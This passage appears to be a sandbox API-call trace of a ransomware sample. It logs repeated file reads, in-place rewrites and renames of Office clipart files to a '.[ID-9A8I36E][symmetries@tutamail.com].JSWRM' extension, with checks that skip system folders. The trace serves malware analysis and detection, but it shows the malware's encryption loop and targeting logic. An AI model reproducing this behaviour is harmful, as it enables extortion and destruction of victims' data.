lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01183_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0076.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x212328 [0076.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01183_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.446] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2296) returned 1 [0076.446] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8f0) returned 0x22fd48 [0076.446] ReadFile (in: hFile=0x314, lpBuffer=0x22fd48, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0x8f0, lpOverlapped=0x0) returned 1 [0076.447] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.448] WriteFile (in: hFile=0x314, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0x8f0, lpOverlapped=0x0) returned 1 [0076.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0076.448] CloseHandle (hObject=0x314) returned 1 [0076.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x22a518 [0076.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0076.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0076.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0076.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0076.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0076.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.448] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01183_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01183_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0076.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22a518 | out: hHeap=0x1e0000) returned 1 [0076.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.449] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2174, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01186_.WMF", cAlternateFileName="")) returned 1 [0076.449] lstrcmpiW (lpString1="DD01186_.WMF", lpString2=".") returned 1 [0076.449] lstrcmpiW (lpString1="DD01186_.WMF", lpString2="..") returned 1 [0076.449] lstrcmpiW (lpString1="DD01186_.WMF", lpString2="...") returned 1 [0076.449] lstrcmpiW (lpString1="DD01186_.WMF", lpString2="windows") returned -1 [0076.449] lstrcmpiW (lpString1="DD01186_.WMF", lpString2="recovery") returned -1 [0076.449] lstrcmpiW (lpString1="DD01186_.WMF", lpString2="perflogs") returned -1 [0076.449] lstrcmpiW (lpString1="DD01186_.WMF", lpString2="documents and settings") returned -1 [0076.449] lstrcmpiW (lpString1="DD01186_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.449] lstrcmpiW (lpString1="DD01186_.WMF", lpString2="system volume information") returned -1 [0076.449] lstrcmpiW (lpString1="DD01186_.WMF", lpString2="msocache") returned -1 [0076.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0076.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01186_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01186_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01186_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0076.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0076.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01186_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01186_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01186_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0076.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x212328 | out: hHeap=0x1e0000) returned 1 [0076.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x212328 [0076.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.450] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8564) returned 1 [0076.450] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2170) returned 0x24d210 [0076.450] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2170, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2170, lpOverlapped=0x0) returned 1 [0076.452] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.452] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2170, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2170, lpOverlapped=0x0) returned 1 [0076.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0076.452] CloseHandle (hObject=0x314) returned 1 [0076.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x22a518 [0076.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0076.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0076.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0076.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0076.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0076.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.452] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01186_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01186_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01186_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0076.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22a518 | out: hHeap=0x1e0000) returned 1 [0076.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x212328 | out: hHeap=0x1e0000) returned 1 [0076.454] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6e8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01366_.WMF", cAlternateFileName="")) returned 1 [0076.454] lstrcmpiW (lpString1="DD01366_.WMF", lpString2=".") returned 1 [0076.454] lstrcmpiW (lpString1="DD01366_.WMF", lpString2="..") returned 1 [0076.454] lstrcmpiW (lpString1="DD01366_.WMF", lpString2="...") returned 1 [0076.454] lstrcmpiW (lpString1="DD01366_.WMF", lpString2="windows") returned -1 [0076.454] lstrcmpiW (lpString1="DD01366_.WMF", lpString2="recovery") returned -1 [0076.454] lstrcmpiW (lpString1="DD01366_.WMF", lpString2="perflogs") returned -1 [0076.454] lstrcmpiW (lpString1="DD01366_.WMF", lpString2="documents and settings") returned -1 [0076.454] lstrcmpiW (lpString1="DD01366_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.454] lstrcmpiW (lpString1="DD01366_.WMF", lpString2="system volume information") returned -1 [0076.454] lstrcmpiW (lpString1="DD01366_.WMF", lpString2="msocache") returned -1 [0076.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0076.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01366_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01366_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01366_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0076.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0076.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01366_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01366_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01366_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0076.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x212328 [0076.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01366_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.454] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1768) returned 1 [0076.454] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6e0) returned 0x22fd48 [0076.455] ReadFile (in: hFile=0x314, lpBuffer=0x22fd48, nNumberOfBytesToRead=0x6e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0x6e0, lpOverlapped=0x0) returned 1 [0076.458] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.458] WriteFile (in: hFile=0x314, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0x6e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0x6e0, lpOverlapped=0x0) returned 1 [0076.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0076.458] CloseHandle (hObject=0x314) returned 1 [0076.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x22a518 [0076.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0076.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0076.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0076.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0076.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0076.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.459] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01366_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01366_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0076.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22a518 | out: hHeap=0x1e0000) returned 1 [0076.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.459] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x384, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01434_.WMF", cAlternateFileName="")) returned 1 [0076.459] lstrcmpiW (lpString1="DD01434_.WMF", lpString2=".") returned 1 [0076.459] lstrcmpiW (lpString1="DD01434_.WMF", lpString2="..") returned 1 [0076.460] lstrcmpiW (lpString1="DD01434_.WMF", lpString2="...") returned 1 [0076.460] lstrcmpiW (lpString1="DD01434_.WMF", lpString2="windows") returned -1 [0076.460] lstrcmpiW (lpString1="DD01434_.WMF", lpString2="recovery") returned -1 [0076.460] lstrcmpiW (lpString1="DD01434_.WMF", lpString2="perflogs") returned -1 [0076.460] lstrcmpiW (lpString1="DD01434_.WMF", lpString2="documents and settings") returned -1 [0076.460] lstrcmpiW (lpString1="DD01434_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.460] lstrcmpiW (lpString1="DD01434_.WMF", lpString2="system volume information") returned -1 [0076.460] lstrcmpiW (lpString1="DD01434_.WMF", lpString2="msocache") returned -1 [0076.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0076.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01434_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01434_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01434_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0076.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01434_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01434_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01434_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x212328 | out: hHeap=0x1e0000) returned 1 [0076.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x212328 [0076.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01434_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.461] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=900) returned 1 [0076.461] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x380) returned 0x20e550 [0076.461] ReadFile (in: hFile=0x314, lpBuffer=0x20e550, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x380, lpOverlapped=0x0) returned 1 [0076.463] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, 